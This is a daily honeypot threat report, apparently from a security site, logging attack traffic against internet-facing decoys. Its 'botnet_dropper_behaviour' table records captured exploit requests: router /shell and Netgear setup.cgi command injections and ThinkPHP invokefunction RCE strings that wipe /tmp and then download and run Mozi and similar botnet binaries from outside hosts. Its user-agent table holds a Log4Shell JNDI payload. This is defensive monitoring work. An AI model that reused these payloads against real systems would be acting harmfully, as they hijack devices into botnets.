Skip to main content
  1. Daily-Posts/

Report: 2025-03-20

·5158 words·
Repport Daily
Author
Shoggoth Industries
Table of Contents

Daily Report: 2025-03-20
#

interaction report on http service of various Hhoneypot around the world.

ot_simplified_report
#

simplified report for medium-level interactions with honeypots that mimic industrial systems (web site loading, or interactions with the website), for more contact us on social@shoggoth.industries.

source_countrytargeted_country
USSingapore
USAustralia
AU
USDubai
USDubai
CNGeorgia
PL
US
AE
US

botnet_dropper_behaviour
#

remote_addrrequest
187.142.48.94GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.129.101/jaws;chmod+777+/tmp/jaws;sh+/tmp/jaws HTTP/1.1
187.189.193.240GET /shell?cd+/tmp;rm+-rf+*;wget+ http://157.245.200.182/Binarys/Nyx4r.arm;chmod+777+/tmp/Nyx4r.arm;sh+/tmp/Nyx4r.arm arm4.jaws HTTP/1.1
45.230.66.48GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.230.66.48:10756/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
58.146.59.84GET /shell?cd+/tmp;rm+-rf+*;wget+ http://200.129.143.6/Binarys/Owari.arm;chmod+777+/tmp/Owari.arm;sh+/tmp/Owari.arm arm4.jaws HTTP/1.1
45.178.250.2327;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0
189.167.71.63GET /shell?cd+/tmp;rm+-rf+*;wget+ 213.209.129.101/jaws;chmod+777+/tmp/jaws;sh+/tmp/jaws HTTP/1.1
180.106.105.231GET /shell?cd+/tmp;rm+-rf+*;wget+http://180.106.105.231:44989/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
167.114.86.185GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://193.239.147.201/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
211.143.108.124GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1
118.40.165.223GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]=‘wget http://185.225.75.8/bins/vcimanagement.x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp’ HTTP/1.1
123.157.136.106GET /index.php?s=/index/\x09hink\x07pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= ‘wget http://5.255.115.56/x86_64 -O /tmp/.phpdsds; chmod 777 /tmp/.phpdsds; /tmp/.phpdsds php.x86’ HTTP/1.1

user_agent
#

The list of User Agent presented here are those that have not yet been yet integrated into the user agent database database.

number_of_occurenceuser_agent
0113Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.120 Safari/537.36
133Mozilla/5.0 (iPhone; CPU iPhone OS 17_6_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Mobile/15E148 Safari/604.1
228Mozilla/5.0 (iPhone; CPU iPhone OS 17_5_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Mobile/15E148 Safari/604.1
328Mozilla/5.0 (iPhone; CPU iPhone OS 18_3_2 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Mobile/15E148 Safari/604.1 Ddg/18.3
47Mozilla/5.0 (Linux; U; Android 2.3.3; ko-kr; SHW-M250S Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
56Opera/8.88.(X11; Linux i686; ur-PK) Presto/2.9.160 Version/12.00
66Googlebot-Video/1.0
73Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15
83Xpanse, a Palo Alto Networks company, indexes customer network perimeters. If you have any questions or concerns, please reach out to: scaninfo@paloaltonetworks.com.
92Mozilla/5.0 (Linux; Android 9; moto x4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.157 Mobile Safari/537.36
102Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3068.0 Safari/537.36
112Mozilla/5.0 (Debian; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36
122Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.5 Safari/605.6.18
132Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.98 Safari/537.36
142Mozilla/5.0 (X11; U; Linux i686; tr-TR; rv:1.9.0) Gecko/2008061600 SUSE/3.0-1.2 Firefox/3.0
152Mozilla/5.0 (Linux; Android 7.1.1; Z899VL Build/NMF26V) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36
162${jndi:ldap://${:-131}${:-904}.${hostName}.useragent.cvdlqtvdueihu608mbb0p1q1yfh417nw6.oast.site}
172Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.2 Safari/605.3.17
182Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
192Mozilla/5.0 (Macintosh; Intel Mac OS X 12.5) AppleWebKit/617.19 (KHTML, like Gecko) Version/17.6.47 Safari/617.19
202Mozilla/5.0 (CentOS; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/125.0.0.0 Safari/537.36
212Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36
222Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.4.1 Safari/605.1.24
232Mozilla/5.0 (Kubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
241Mozilla/5.0 (Linux; U; Android 4.2.2; fr-ca; GT-P5113 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
251Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; WOW64; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)
261Opera/8.01 (Windows NT 5.1; U; fr)
271Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.2) Gecko/20100130 Gentoo Firefox/3.6
281Mozilla/5.0 (Windows; U; Win 9x 4.90; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5
291Mozilla/5.0 (Linux; U; Android 4.2.2; en-us; HUAWEI Y600-U20 Build/HUAWEIY600-U20) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
301Mozilla/5.0 (X11; U; Linux i686; fi-FI; rv:1.9.2.8) Gecko/20100723 Ubuntu/10.04 (lucid) Firefox/3.6.8
311Mozilla/4.0 (compatible; MSIE 5.50; Windows 95; SiteKiosk 4.8)
321Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36
331Mozilla/5.0 (Ubuntu; X11; Linux x86_64; rv:9.0.1) Gecko/20100101 Firefox/9.0.1
341Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
351Mozilla/4.0 (Windows; MSIE 6.0; Windows NT 6.0)
361Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US) AppleWebKit/525.19 (KHTML, like Gecko) Chrome/1.0.154.46 Safari/525.19
371Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.6) Gecko/20050225 Firefox/1.0.1
381Mozilla/5.0 (iPad; CPU OS 8_1 like Mac OS X) AppleWebKit/600.1.4.11.10 (KHTML, like Gecko) Version/5.1 Mobile/9B206 Safari/7534.48.3
391Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/37.0.2062.103 Safari/537.36
401Callpod Keeper for Android 1.0 (10.1.1/240) Dalvik/2.1.0 (Linux; U; Android 6.0; LG-V495 Build/MRA58K)
411Mozilla/5.0 (Windows NT 6.2; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/57.0.2987.133 Safari/537.36
421Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0
431Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.75 Safari/537.36
441Mozilla/5.0 (Windows NT 6.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
451Mozilla/5.0 (iPad; CPU OS 7_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A406 Safari/8536.25
461Opera/9.80 (Windows NT 6.2) Presto/2.12.388 Version/12.14
471Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.8.25
481Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36
491Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.84 Safari/537.36
501Mozilla/5.0 (Windows; U; Windows NT 5.0; de-DE; rv:1.7.6) Gecko/20050321 Firefox/1.0.2
511Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:28.0) Gecko/20100101 Firefox/31.0
521Mozilla/5.0 (Windows NT 6.3; Win64, x64; Trident/7.0; rv:11.0) like Gecko
531Opera/9.80 (Windows NT 5.1; U; zh-cn) Presto/2.2.15 Version/10.00
541Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.87 Safari/537.36
551Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
561Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/601.2.7 (KHTML, like Gecko) Version/11.0.1 Safari/601.2.7
571Mozilla/5.0 (Windows; U; Windows NT 6.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3
581Mozilla/5.0 (Windows NT 6.1; rv:7.0) Gecko/20100101 Firefox/7.0
591Mozilla/5.0 (Windows NT 10.0; rv:55.0) Gecko/20100101 Firefox/55.0
601Mozilla/5.0 (Linux; U; Android 4.1.2; en-us; LGMS769 Build/JZO54K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
611MT6735_TD/V1 Linux/3.10.65+ Android/5.1 Release/03.03.2015 Browser/AppleWebKit537.36 Chrome/39.0.0.0 Mobile Safari/537.36 System/Android 5.1;
621Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.104 AOL/9.8 AOLBuild/4346.18.US Safari/537.36
631Mozilla/5.0 (Linux; U; Android 2.3.6; en-gb; GT-I8160 Build/GINGERBREAD) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
641libwww-perl/6.67
651Mozilla/5.0 (Linux; Android 9; SM-G970U1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
661Mozilla/5.0 (X11; U; Linux x86_64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.94 Safari/535.1
671Mozilla/5.0 (X11; Linux i686; rv:40.0) Gecko/20100101 Firefox/40.0
681Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.87 Safari/537.36
691Python/3.7 aiohttp/3.8.1
701Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.100 Safari/534.30
711Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:82.0) Gecko/20100101 Firefox/82.0
721Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.75 Safari/537.36
731Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.100 Safari/537.36
741Mozilla/5.0 (X11; NetBSD amd64; rv:30.0) Gecko/20100101 Firefox/30.0
751Mozilla/5.0 (X11; U; Linux x86_64; de-AT; rv:1.8.0.2) Gecko/20060422 Firefox/1.5.0.2
761Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.1; en-US)
771SonyEricssonW995/R1EA Profile/MIDP-2.1 Configuration/CLDC-1.1 UNTRUSTED/1.0
781Mozilla/5.0 (Linux; Android 9; CLT-L29) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/76.0.3809.111 Mobile Safari/537.36
791Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.125 Safari/537.36
801Mozilla/5.0 (Macintosh; PPC Mac OS X) AppleWebKit/534.34 (KHTML, like Gecko) PhantomJS/1.9.8 Safari/534.34
811Mozilla/5.0 (Linux; Android 4.1.2; GT-N8013) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.99 Safari/537.36
821Mozilla/5.0 (Macintosh; Intel Mac OS X 13_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/16.1 Safari/605.1.15
831Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.90 Safari/537.36
841Mozilla/5.0 (Linux; U; Android 2.2; en-ca; GT-P1000M Build/FROYO) AppleWebKit/533.1 (KHTML, like Gecko) Version/4.0 Mobile Safari/533.1
851Mozilla/5.0 (Linux; U; Android 3.0; en-us; Xoom Build/HRI39) AppleWebKit/525.10 (KHTML, like Gecko) Version/3.0.4 Mobile Safari/523.12.2
861libwww-perl/6.76
871Mozilla/5.0 (Linux; Android 5.0.2; Redmi Note 3 Build/LRX22G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/57.0.2987.132 MQQBrowser/6.2 TBS/044030 Mobile Safari/537.36 MicroMessenger/6.6.6.1300(0x26060636) NetType/4G Language/zh_CN
881Mozilla/5.0 (Linux; Android 5.0.2; vivo X6A Build/LRX22G; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/48.0.2564.116 Mobile Safari/537.36 T7/10.8 baiduboxapp/10.8.0.10 (Baidu; P1 5.0.2)
891Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
901Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.17 (KHTML, like Gecko) Chrome/24.0.1312.57 Safari/537.17
911Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.186 YaBrowser/18.3.1.1232 Yowser/2.5 Safari/537.36
921Mozilla/5.0 (X11; U; Linux i686; pl-PL; rv:1.9.0.2) Gecko/20121223 Ubuntu/9.25 (jaunty) Firefox/3.8
931Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/6.0; .NET4.0E; .NET4.0C; .NET CLR 3.5.30729; .NET CLR 2.0.50727; .NET CLR 3.0.30729; MASMJS)
941Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.49 Safari/537.36
951Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
961Mozilla/5.0 (Linux; U; Android 4.4.2; en-us; HUAWEI Y360-U61 Build/HUAWEIY360-U61) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30;
971Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.8.1.10) Gecko/20071015 SUSE/2.0.0.10-0.2 Firefox/2.0.0.10
981Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
991More Firefox 3.5 user agents strings –»
1001Mozilla/5.0 (Android 5.1.1; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0
1011Mozilla/5.0 (X11; U; Linux amd64; en-US; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7
1021Mozilla/5.0 (Linux; Android 5.1.1; SM-G920V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.83 Mobile Safari/537.36
1031Opera/9.00 (X11; Linux i686; U; pl)
1041Mozilla/5.0 (iPad; CPU OS 9_2_1 like Mac OS X) AppleWebKit/601.1.46 (KHTML, like Gecko) Version/9.0 Mobile/13D20 Safari/601.1
1051Mozilla/5.0 (X11; U; Linux i686; de-AT; rv:1.7.5) Gecko/20041128 Firefox/1.0 (Debian package 1.0-4)
1061Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.91 Safari/537.36 OPR/48.0.2685.32
1071Opera/9.80 (Android; Opera Mini/24.0.2254/62.178; U; en) Presto/2.12.423 Version/12.16
1081Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Win64; x64; Trident/4.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
1091Mozilla/5.0 (Linux; Android 7.0; LGUS997 Build/NRD90U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Mobile Safari/537.36
1101Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
1111Mozilla/5.0 (Windows; U; Windows NT 5.1; it-IT; rv:1.7.7) Gecko/20050414 Firefox/1.0.3
1121Mozilla/5.0 (iPhone; CPU iPhone OS 10_3_3 like Mac OS X) AppleWebKit/603.3.8 (KHTML, like Gecko) Version/9.0 Mobile/13B143 Safari/601.1
1131Mozilla/5.0 (Windows; U; Windows NT 5.1; pt-PT; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2 (.NET CLR 3.5.30729)
1141Mozilla/5.0 (X11; Linux i686; rv:2.0) Gecko/20100101 Firefox/4.0
1151Mozilla/5.0 (Linux; Android 6.0.1; SM-S327VL Build/MMB29M) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Mobile Safari/537.36
1161Mozilla/5.0 (X11; U; Linux ppc; fr; rv:1.9.2.12) Gecko/20101027 Ubuntu/10.10 (maverick) Firefox/3.6.12
1171Opera/9.80 (Linux mips; ) Presto/2.12.407 Version/12.51 MB97/0.0.39.10 (JVC, Mxl661L32, wireless) VSTVB_MB97 SmartTvA/3.0.0
1181Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
1191Mozilla/5.0 (Linux; U; Android 4.0.4; ar-ae; GT-P7500 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
1201Mozilla/5.0 (Windows; U; Windows NT 6.1; es-ES; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3 GTB7.1
1211Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/534.2 (KHTML, like Gecko) Chrome/6.0.454.0 Safari/534.2
1221Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.115 Safari/537.36
1231Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; MediaPad 7 Lite Build/HuaweiMediaPad) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
1241Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E; Media Center PC 6.0)
1251Mozilla/5.0 (Linux; Android 7.0; LGMP260 Build/NRD90U) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.158 Mobile Safari/537.36
1261Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; NP08; MAAU; NP08; rv:11.0) like Gecko
1271Mozilla/5.0 (Windows; U; Windows NT 6.0; de; rv:1.9.1.2) Gecko/20090729 Firefox/3.5.2
1281Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36
1291Mozilla/5.0 (Windows; U; Windows NT 6.1; ja-JP) AppleWebKit/533.16 (KHTML, like Gecko) Version/5.0 Safari/533.16
1301Mozilla/5.0 (Android 4.4.2; Tablet; rv:49.0) Gecko/49.0 Firefox/49.0
1311Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36 OPR/34.0.2036.25
1321Mozilla/5.0 (Windows NT 6.3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.2357.125 Safari/537.36 OPR/30.0.1835.88
1331Mozilla/5.0 (X11; U; Linux x86_64; en-US) AppleWebKit/534.14 (KHTML, like Gecko) Ubuntu/10.10 Chromium/9.0.600.0 Chrome/9.0.600.0 Safari/534.14
1341Opera/9.50 (Windows NT 5.2; U; it)
1351Mozilla/5.0 (Linux; U; Android 4.2.2; en-gb; SM-T111 Build/JDQ39) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30
1361Mozilla/5.0 (Android 4.4.2; Mobile; rv:50.0) Gecko/50.0 Firefox/50.0
1371Mozilla/5.0 (X11; Linux i686) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.215 Safari/535.1
1381Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; Trident/6.0; MDDRJS)
1391Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.15) Gecko/20110303 Firefox/3.6.15
1401Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.8 Safari/537.36 OPR/40.0.2301.0 (Edition developer)
1411Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/5.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; Tablet PC 2.0)
1421Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; .NET CLR 1.1.4322)
1431Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-N900A Build/LRX21V) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/2.1 Chrome/34.0.1847.76 Mobile Safari/537.36
1441More Internet Explorer 4.01 user agents strings –»
1451Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.5 (KHTML, like Gecko) Chrome/ Safari/530.5
1461Mozilla/5.0 (Linux; Android 4.4.2; SM-T230NU Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/59.0.3071.125 Safari/537.36
1471Opera/9.01 (Macintosh; PPC Mac OS X; U; en)
1481Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; MID8042 Build/IML74K) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Safari/534.30

request
#

The list of requests presented here are those that have not yet been yet integrated into the request database.

number_of_occurencerequest
010\x04\x01\x01\xBB\x00\x00\x00\x01proxychecker\x00api.ip.pn\x00
110CONNECT api.ip.pn:443 HTTP/1.1
28POST /FormLogin HTTP/1.1
38GET /login.rsp HTTP/1.1
46GET /restore.php HTTP/1.1
56MGLNDD_xxx.xxx.xxx.xxx_80
65GET /mips.nn HTTP/1.1
75GET /bins/sora.ppc HTTP/1.1
85GET /debug.dbg HTTP/1.1
95GET /vv/mips64 HTTP/1.1
105GET /bins/sora.arm6 HTTP/1.1
115GET /vv/powerpc HTTP/1.1
125GET /splsh4 HTTP/1.1
135GET /aarch64 HTTP/1.1
145GET /splarm6 HTTP/1.1
155GET /x86_32.nn HTTP/1.1
165GET /m68k.nn HTTP/1.1
175GET /sparc.nn HTTP/1.1
185GET /main_arm6 HTTP/1.1
195GET /arm6.nn HTTP/1.1
205GET /arm7.nn HTTP/1.1
215GET /main_x86_64 HTTP/1.1
225GET /jklspc HTTP/1.1
235GET /tt/sparc HTTP/1.1
245GET /tt/i686 HTTP/1.1
255GET /vv/riscv32 HTTP/1.1
264GET /tmpsl HTTP/1.1
274GET /Yboats.arm7 HTTP/1.1
284POST /wls-wsat/CoordinatorPortType HTTP/1.1
294GET /bins/sora.mpsl HTTP/1.1
304GET /Yboats.arm5 HTTP/1.1
314GET /Yboats.arm HTTP/1.1
324GET /Module1/js/Module_2o6q5no3oqp65504359524o2150s4333.js HTTP/1.1
334GET /vv/armv4eb HTTP/1.1
344POST /login.html HTTP/1.0
354GET /main_arm7 HTTP/1.1
364GET /vv/mips HTTP/1.1
374GET /vv/sh4 HTTP/1.1
384GET /tt/sh4 HTTP/1.1
394GET /jklx86 HTTP/1.1
404GET /splarm HTTP/1.1
414GET /splmpsl HTTP/1.1
424GET /nshkarm5 HTTP/1.1
433GET /nshkppc HTTP/1.1
443GET /nsharm6 HTTP/1.1
453GET /nsharm7 HTTP/1.1
463GET /nshkx86 HTTP/1.1
473GET /x0ox0ox0oxDefault/z0r0.mpsl HTTP/1.1
483GET /splppc HTTP/1.1
493GET /nabarm7 HTTP/1.1
503GET /splm68k HTTP/1.1
513GET /nabarm6 HTTP/1.1
523GET /mips HTTP/1.1
533GET /t/arm7 HTTP/1.1
543GET /jklppc HTTP/1.1
553GET /sh4.nn HTTP/1.1
563GET /arm5.nn HTTP/1.1
573GET /x86_64.nn HTTP/1.1
583GET /yakuza.ppc HTTP/1.1
593GET /arm.nn HTTP/1.1
603GET /ci/cd/.git/config HTTP/1.1
613GET /LjEZs/uYtea.mpsl HTTP/1.1
623GET /LjEZs/uYtea.arm6 HTTP/1.1
633GET /LjEZs/uYtea.x86_64 HTTP/1.1
643GET /LjEZs/uYtea.x86 HTTP/1.1
653GET /yakuza.i586 HTTP/1.1
663GET /LjEZs/uYtea.spc HTTP/1.1
673GET /hidakibest.arm4 HTTP/1.1
683GET /yakuza.arm6 HTTP/1.1
693GET /dss HTTP/1.1
703GET /hidakibest.mips HTTP/1.1
713GET /bins/sora.spc HTTP/1.1
723GET /bins/sora.mips HTTP/1.1
733GET /bins/sora.arm5 HTTP/1.1
743GET /bins/sora.m68k HTTP/1.1
753GET /vv/i686 HTTP/1.1
763GET /tarm7 HTTP/1.1
773GET /tsh4 HTTP/1.1
783GET /tt/powerpc HTTP/1.1
793GET /tt/armv5l HTTP/1.1
803GET /hiddenbin/boatnet.spc HTTP/1.1
813GET /tarm HTTP/1.1
823GET /tarm5 HTTP/1.1
833GET /ee/armv6l HTTP/1.1
843GET /tt/mipsel64 HTTP/1.1
853GET /tt/armv4l HTTP/1.1
863GET /tt/mips HTTP/1.1
873GET /ee/armv5l HTTP/1.1
883GET /ee/armv4eb HTTP/1.1
893GET /vv/armv5l HTTP/1.1
903GET /tt/riscv32 HTTP/1.1
913GET /vv/arc HTTP/1.1
923GET /vv/sparc HTTP/1.1
933GET /tt/mips64 HTTP/1.1
943GET /bins/sora.x86 HTTP/1.1
953GET /s/arm5 HTTP/1.1
963GET /nshmpsl HTTP/1.1
973GET /bins/sora.arm HTTP/1.1
983GET /bins/sora.sh4 HTTP/1.1
993GET /bins/sora.arm7 HTTP/1.1
1003GET /Media/Images/N3P3R87R.png HTTP/1.1
1013GET /Yboats.mips HTTP/1.1
1023GET /x0ox0ox0oxDefault/z0r0.x86 HTTP/1.1
1033GET /Yboats.i686 HTTP/1.1
1043GET /Yboats.arm6 HTTP/1.1
1053GET /Yboats.mpsl HTTP/1.1
1063GET /x0ox0ox0oxDefault/z0r0.arm HTTP/1.1
1073GET /x0ox0ox0oxDefault/z0r0.m68k HTTP/1.1
1083GET /nshsh4 HTTP/1.1
1093GET /s/mips HTTP/1.1
1103GET /x0ox0ox0oxDefault/z0r0.arm6 HTTP/1.1
1113GET /x0ox0ox0oxDefault/z0r0.i686 HTTP/1.1
1123GET /x0ox0ox0oxDefault/z0r0.spc HTTP/1.1
